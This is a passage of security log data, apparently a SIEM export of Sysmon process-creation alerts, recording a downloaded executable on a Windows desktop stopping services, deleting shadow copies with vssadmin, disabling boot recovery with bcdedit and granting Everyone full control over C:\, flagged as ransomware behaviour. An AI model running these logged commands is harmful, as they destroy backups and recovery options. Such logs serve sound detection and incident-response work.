DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1aa3-5ec9-0000-001062760e00} +ParentProcessId: 6912 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.445787700Z"",""eventRecordID"":""1660"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:20.408\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00107e880e00}\r\nProcessId: 4820\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1aa3-5ec9-0000-001062760e00}\r\nParentProcessId: 6912\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:20.408"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-00107e880e00}"",""processId"":""4820"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1aa3-5ec9-0000-001062760e00}"",""parentProcessId"":""6912"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:44:35.646",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:20.264 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00103f820e00} +ProcessId: 5548 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.269438000Z"",""eventRecordID"":""1659"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:20.264\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00103f820e00}\r\nProcessId: 5548\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:20.264"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-00103f820e00}"",""processId"":""5548"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.643",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:19.990 +ProcessGuid: {df9fc3d3-1aa3-5ec9-0000-001062760e00} +ProcessId: 6912 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.073555500Z"",""eventRecordID"":""1658"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:19.990\r\nProcessGuid: {df9fc3d3-1aa3-5ec9-0000-001062760e00}\r\nProcessId: 6912\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:19.990"",""processGuid"":""{df9fc3d3-1aa3-5ec9-0000-001062760e00}"",""processId"":""6912"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.603",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:19.893 +ProcessGuid: {df9fc3d3-1aa3-5ec9-0000-00102c6e0e00} +ProcessId: 8116 +Image: C:\Windows\System32\bcdedit.exe +FileVersion: 10.0.18362.295 (WinBuild.160101.0800) +Description: Boot Configuration Data Editor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: bcdedit.exe +CommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default} +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","bcdedit /set {default} recoveryenabled No & bcdedit /set {default}","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:19.919372600Z"",""eventRecordID"":""1656"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:19.893\r\nProcessGuid: {df9fc3d3-1aa3-5ec9-0000-00102c6e0e00}\r\nProcessId: 8116\r\nImage: C:\\Windows\\System32\\bcdedit.exe\r\nFileVersion: 10.0.18362.295 (WinBuild.160101.0800)\r\nDescription: Boot Configuration Data Editor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: bcdedit.exe\r\nCommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:19.893"",""processGuid"":""{df9fc3d3-1aa3-5ec9-0000-00102c6e0e00}"",""processId"":""8116"",""image"":""C:\\\\Windows\\\\System32\\\\bcdedit.exe"",""fileVersion"":""10.0.18362.295 (WinBuild.160101.0800)"",""description"":""Boot Configuration Data Editor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""bcdedit.exe"",""commandLine"":""bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.600",15,"ATT&CK T1070 T1490: Shadow Copies Deletion Using Operating Systems Utilities","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:19.892 +ProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010fd6d0e00} +ProcessId: 8108 +Image: C:\Windows\System32\vssadmin.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Command Line Interface for Microsoft® Volume Shadow Copy Service +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: VSSADMIN.EXE +CommandLine: vssadmin.exe Delete Shadows /all /quiet +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","vssadmin.exe Delete Shadows /all /quiet","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:19.918258300Z"",""eventRecordID"":""1655"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:19.892\r\nProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010fd6d0e00}\r\nProcessId: 8108\r\nImage: C:\\Windows\\System32\\vssadmin.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Command Line Interface for Microsoft® Volume Shadow Copy Service \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: VSSADMIN.EXE\r\nCommandLine: vssadmin.exe Delete Shadows /all /quiet\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:19.892"",""processGuid"":""{df9fc3d3-1aa3-5ec9-0000-0010fd6d0e00}"",""processId"":""8108"",""image"":""C:\\\\Windows\\\\System32\\\\vssadmin.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Command Line Interface for Microsoft® Volume Shadow Copy Service"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""VSSADMIN.EXE"",""commandLine"":""vssadmin.exe Delete Shadows /all /quiet"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.495",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:19.888 +ProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010a56d0e00} +ProcessId: 8092 +Image: C:\Windows\System32\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: icacls ""C:\*"" /grant Everyone:F /T /C /Q +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","icacls \""C:\\*\"" /grant Everyone:F /T /C /Q","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:19.915262300Z"",""eventRecordID"":""1653"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:19.888\r\nProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010a56d0e00}\r\nProcessId: 8092\r\nImage: C:\\Windows\\System32\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: icacls \""C:\\*\"" /grant Everyone:F /T /C /Q\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:19.888"",""processGuid"":""{df9fc3d3-1aa3-5ec9-0000-0010a56d0e00}"",""processId"":""8092"",""image"":""C:\\\\Windows\\\\System32\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""icacls \\\""C:\\\\*\\\"" /grant Everyone:F /T /C /Q"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.491",9,"Windows Application error event","""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """,, +"May 23, 2020 @ 12:44:34.300",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:16.480 +ProcessGuid: {df9fc3d3-1aa0-5ec9-0000-0010ffa40d00} +ProcessId: 7660 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: explorer.exe /LOADSAVEDWINDOWS +CurrentDirectory: C:\Windows\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-1a9b-5ec9-0000-0010c5100d00} +ParentProcessId: 7432 +ParentImage: C:\Windows\System32\sihost.exe +ParentCommandLine: sihost.exe""","explorer.exe /LOADSAVEDWINDOWS","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:16.488376700Z"",""eventRecordID"":""1649"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:16.480\r\nProcessGuid: {df9fc3d3-1aa0-5ec9-0000-0010ffa40d00}\r\nProcessId: 7660\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: explorer.exe /LOADSAVEDWINDOWS\r\nCurrentDirectory: C:\\Windows\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-1a9b-5ec9-0000-0010c5100d00}\r\nParentProcessId: 7432\r\nParentImage: C:\\Windows\\System32\\sihost.exe\r\nParentCommandLine: 